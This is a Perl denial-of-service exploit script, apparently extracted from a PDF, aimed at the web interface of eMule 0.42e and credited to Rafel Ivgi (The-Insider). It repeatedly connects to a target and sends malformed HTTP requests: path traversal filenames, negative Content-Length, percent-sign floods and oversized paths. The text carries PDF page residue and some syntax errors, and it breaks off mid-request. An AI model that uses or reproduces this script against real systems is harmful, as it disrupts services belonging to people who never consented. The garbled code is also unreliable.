1 #!/usr/bin/perl
2
3 system("cls");
4 # Emule 0.42e Remote Denial Of Service Exploit
5 # Coded by Rafel Ivgi, The−Insider
6 # usage: perl emule042e.pl <host> <port> <how many times>
7
8 use IO::Socket;
9 my $host = $ARGV[0];
10 my $port = $ARGV[1];
11 my $times = $ARGV[2];
12
13 if ($host)
14 {
15 unless($port) { $port="4711";}
16 unless($times) { $times="50";}
17 {
18 print "Emule 0.42e Remote Denial Of Service Exploit
19
Coded by The−Insider\n\n";
20 print "[+] Connecting to target $host:$port\n";
21 for $i (1..$times) {
22 $remote=IO::Socket::INET−>new(Proto =>"tcp",
23 PeerAddr => $host,
24 PeerPort => 80,
25 Type => SOCK_STREAM
26 Timeout => 8);
27
28 unless ($remote)
29 {
30 die "can’t connect to $host"
31 }
32 print "[+] Connected to target $host:$port\n";
33 print "[+] Sending Request\n";
34 $remote −>autoflush(1);
35 print $remote "GET / HTTP/1.1
36 Content−Disposition: form−data; name=\"file\";
37
filename=\"../../../file.txt\"
38
39 ";
40 print $remote "POST / HTTP/1.0
41 Content−Length: 10
42
43
123456789
44
45 ";
46 print $remote "POST / HTTP/1.1
47 Content−Length: −1
48
49 ";
50 print $remote "GET /%%%%%%%%%%%% HTTP/1.0
51
52 ";
Page 1/3
Emule 0.42e Remote Denial Of Service Exploit
Rafel Ivgi
05/16/2004
53 print $remote "index.htm
54
55 ";
56 print $remote "GET
57
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
58
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
59
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
60
aaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
61
62 ";
63 print $remote "GET
64
/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
65
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
66
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa